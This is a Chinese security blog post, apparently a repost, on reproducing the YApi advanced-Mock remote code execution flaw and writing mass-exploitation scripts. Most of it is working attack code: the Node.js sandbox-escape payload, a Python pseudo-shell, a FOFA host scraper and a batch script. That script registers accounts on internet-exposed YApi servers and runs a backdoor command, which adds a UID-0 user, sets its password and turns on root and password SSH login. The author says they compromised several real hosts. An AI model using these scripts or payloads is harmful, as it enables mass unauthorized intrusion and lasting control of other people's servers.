Yapi RCE 复现和批量编写

admin 2021年11月23日19:20:46评论170 views字数 8426阅读28分5秒阅读模式
Yapi RCE 复现和批量编写
原创稿件征集

邮箱:[email protected]
QQ:3200599554
黑客与极客相关,互联网安全领域里
的热点话题
漏洞、技术相关的调查或分析
稿件通过并发布还能收获
200-800元不等的稿酬

  • 前言

  • 一、漏洞复现

  • 二、伪shell的编写

  • 二、批量脚本 *

    • fofa.py

    • fofasearch.py

    • yapi.py

  • 总结

前言

前几天胖白师傅给我们分享了Yapi命令执行漏洞的利用,起因是《腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用》https://baijiahao.baidu.com/s?id=1704695582584267257&wfr=spider&for=pc,可以看到文章发布的时间是7月8号,但是师傅发现该漏洞其实在一月份就已经被爆出,甚至都给出了exp《高级Mock可以获取到系统操作权限》https://github.com/YMFE/yapi/issues/2099
然后这两天发现复现文章还蛮多的,但是第一次拿下好几个肉鸡,还是想记录一下
感谢胖白师傅的分享,感谢海星姐对脚本的优化

一、漏洞复现

首先祭出fofa,搜索语句为 app="yapi",但是为了避开国内,所以使用 app="yapi" && country="SG"SG为新加坡,结果如图
Yapi RCE 复现和批量编写
虽然有30页,但是能利用的可能也没几个,而且 docker 居多
顺便记录一下验证 docker 的两个小方法
  • ps -ef :docker 一般显示很少的进程

  • ls -a /.dockerenv

点击注册,信息随便填,但是可能会遇到这种情况
Yapi RCE 复现和批量编写
这是第一道坎,不,第一道坎应该是压根就访问不了,这是第二道坎
找了个能注册的,注册完进入如图页面,点击 添加项目
Yapi RCE 复现和批量编写
添加完项目进入如下页面,继续 添加接口
Yapi RCE 复现和批量编写
添加完接口进入如下页面,点击 高级Mock
Yapi RCE 复现和批量编写
《高级Mock可以获取到系统操作权限》https://github.com/YMFE/yapi/issues/2099中的exp,保存到脚本中,但是这里可能保存不成功,第三道坎
const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

Yapi RCE 复现和批量编写
回到预览页面,点击下方的链接
Yapi RCE 复现和批量编写
可以看到命令成功执行了,而且这很大概率不是docker,然后这里有第四道坎,命令可能根本执行不成功,比如 百度yapi
Yapi RCE 复现和批量编写

二、伪shell的编写

一开始只是想写个脚本,快速改Mock脚本,返回执行结果,假装拿到了一个shell
# coding=utf-8import json
import requests
url = 'http://ip:port/'
r = requests.session()
projectID = '131' # http://ip:port/project/131/interface/api/1141interfaceID = '1141' # 131 projectID 1141 interfaceID
headers = { 'Content-Type': 'application/json'}

def login(): data = { "email": "[email protected]", "password": "asd" } rsp = r.post(url + 'api/user/login', data=json.dumps(data), headers=headers) print(rsp.text)

def rce(cmd): # 这里做了优化,对全局变量进行修改,需要关闭 ‘高级Mock’ 中的脚本 poc = '''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''.format(cmd)
data = {"id": projectID, "project_mock_script": f'''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{cmd}").toString()''', "is_mock_open": True} rsp = r.post(url + 'api/project/up', data=json.dumps(data), headers=headers)
print(rsp.text)

def result(): url2 = url + f'mock/{projectID}/1/1' rsp = r.get(url2, headers=headers) print(rsp.text)

if __name__ == '__main__': login() while True: cmd = input('$ ') rce(cmd) result()

该处使用的url网络请求的数据。

二、批量脚本

可能人就是太不能满足了吧,写完 伪shell脚本 之后我又觉得再加点料就能整个批量了,然后就有了下面的脚本
提示:脚本中使用的命令可能无法正常运行,反弹shell才是永远的神。比如我就经常遇到 useradd 不存在的报错,但是这种明显是可以执行命令的。所以请关注脚本的输出

fofa.py

通过 pip install fofa 下载,但是在 python3 中并不能正常运行,所以我修改了一下脚本,改名为 fofa.py 放在脚本的执行目录。
# -*- coding: utf-8 -*-import base64import jsonimport urllibimport urllib.errorimport urllib.parseimport urllib.request

class Client: def __init__(self, email, key): self.email = email self.key = key self.base_url = "https://fofa.so" self.search_api_url = "/api/v1/search/all" self.login_api_url = "/api/v1/info/my" self.get_userinfo() # check email and key
def get_userinfo(self): api_full_url = "%s%s" % (self.base_url, self.login_api_url) param = {"email": self.email, "key": self.key} res = self.__http_get(api_full_url, param) return json.loads(res)
def get_data(self, query_str, page=1, fields=""): res = self.get_json_data(query_str, page, fields) return json.loads(res)
def get_json_data(self, query_str, page=1, fields=""): api_full_url = "%s%s" % (self.base_url, self.search_api_url) param = {"qbase64": base64.b64encode(query_str), "email": self.email, "key": self.key, "page": page, "fields": fields} res = self.__http_get(api_full_url, param) return res
def __http_get(self, url, param): param = urllib.parse.urlencode(param) url = "%s?%s" % (url, param) try: req = urllib.request.Request(url) res = urllib.request.urlopen(req).read() if b"errmsg" in res: raise RuntimeError(res) except urllib.error.HTTPError as e: print("errmsg:" + e.read().decode()), raise e return res

fofasearch.py

import re
import fofa

class Fofa: email = fofa_account key = key # key 在 个人资料中 client = fofa.Client(email, key)
def __init__(self, query_str): self.query_str = query_str
def search(self, page): hostList = [] data = self.client.get_data(self.query_str.encode(), page=page, fields="host") for host in data['results']: if re.search('http
展开收缩
?://'
, host) is None:
host = 'http://' + host if re.search('/$', host) is not None: host = host[:-1] hostList.append(host) return hostList

if __name__ == '__main__': F = Fofa('app="yapi"') for page in range(1, 10):        print(F.search(page))


yapi.py

# coding=utf-8import jsonimport sys
import requests
from fofasearch import Fofa
exp = '''const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("{}").toString()'''

class Yapi: def __init__(self, url): self.r = requests.session() self.url = url self.headers = {'Content-Type': 'application/json'} print('nn' + '*' * 10 + url + '*' * 10)
def register(self, email, passwd, username): data = { "email": email, "password": passwd, "username": username } rsp = self.r.post(self.url + '/api/user/reg', data=json.dumps(data), headers=self.headers, timeout=2) # print(rsp) print(json.loads(rsp.text)['errmsg']) return json.loads(rsp.text)['errmsg']
def login(self, email, passwd): data = { "email": email, "password": passwd } rsp = self.r.post(self.url + '/api/user/login', data=json.dumps(data), headers=self.headers, timeout=2) print(json.loads(rsp.text)['errmsg']) return json.loads(rsp.text)['errmsg']
def getGroupId(self): rsp = self.r.get(self.url + '/api/group/get_mygroup', timeout=2) return json.loads(rsp.text)['data']['_id']
def addProject(self, groupid): data = { "name": "1", "basepath": "/1", "desc": "1", "group_id": groupid, "icon": "code-o", "color": "pink", "project_type": "private" } rsp = self.r.post(self.url + '/api/project/add', data=json.dumps(data), headers=self.headers, timeout=2) projectId = json.loads(rsp.text)['data']['_id'] return projectId
def addInterface(self, projectID): data = { "method": "GET", "catid": "112", "title": "1", "path": "/1", "project_id": projectID }
rsp = self.r.post(self.url + '/api/interface/add', data=json.dumps(data), headers=self.headers, timeout=2) interfaceID = json.loads(rsp.text)['data']['_id'] return interfaceID
def isDocker(self, projectID): data = {"id": projectID, "project_mock_script": exp.format('ls -al /'), "is_mock_open": True}
self.r.post(self.url + '/api/project/up', data=json.dumps(data), headers=self.headers, timeout=10)
def rce(self, cmd, projectID, interfaceId):
data = {"id": projectID, "project_mock_script": exp.format(cmd), "is_mock_open": True}
rsp = self.r.post(self.url + '/api/project/up', data=json.dumps(data), headers=self.headers) # print(rsp.text)
def result(self, projectId): url2 = self.url + f'/mock/{projectId}/1/1' rsp = self.r.get(url2, headers=self.headers) return rsp.text

def main(host, cmd='', email="[email protected]", passwd="123456", username="admin", shell=False, passDocker=False): y = Yapi(host) try: regResult = y.register(email, passwd, username) except: print('register failed') return if regResult == '该email已经注册': try: print('try Login...') result = y.login(email, passwd) if result != 'logout success...': print('login failed...') return except: print('Login failed') return
try: groupId = y.getGroupId() projectID = y.addProject(groupId) print('projectID: ' + str(projectID)) interfaceID = y.addInterface(projectID) except: return
try: y.isDocker(projectID) result = y.result(projectID) except: print('Command execution failed') return
if '.dockerenv' in result: print('this is Docker') if passDocker: return
if shell: while True: cmd = input('n# ') y.rce(cmd, projectID, interfaceID) y.result(projectID) else: try: y.rce(cmd, projectID, interfaceID) result = y.result(projectID) except: print('Command execution failed') return
if 'Invalid or unexpected token' in result: print('Command execution failed') elif len(result) == 0: print('no echo') else: try: print(result) except: print(result.encode())

if __name__ == '__main__': query_str = '(app="yapi" && country=="CN") && (is_honeypot=false && is_fraud=false)'
cmd = '''adduser nginx1 && echo 'nginx1:Ll123@lL'|chpasswd && sed -i '$cnginx1:x:0:0:root:/root:/bin/bash' /etc/passwd && sed -i 's/#* *PermitRootLogin.*/PermitRootLogin yes/g' /etc/ssh/sshd_config && sed -i 's/#* *PasswordAuthentication.*/PasswordAuthentication yes/g' /etc/ssh/sshd_config && echo 'success' && systemctl reload ssh | systemctl reload sshd'''
# f = open('yapi.log', 'a') # sys.stdout = f
F = Fofa(query_str) for page in range(1, 58): hostList = F.search(page)
for host in hostList: try: requests.get(host, timeout=2) except: print('nn' + '*'*10 + host + '*'*10) print('connection failed') continue main(host, cmd)
# f.close()

跑起来就是这种效果,Command execution failed 的有很大概率是可以执行的,但是我的命令有点问题,可以的话,师傅们能给一点修改意见嘛
Yapi RCE 复现和批量编写
Yapi RCE 复现和批量编写
“阅读原文”

体验免费靶场

本文始发于微信公众号(合天网安实验室):Yapi RCE 复现和批量编写

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月23日19:20:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Yapi RCE 复现和批量编写http://cn-sec.com/archives/422948.html

发表评论

匿名网友 填写信息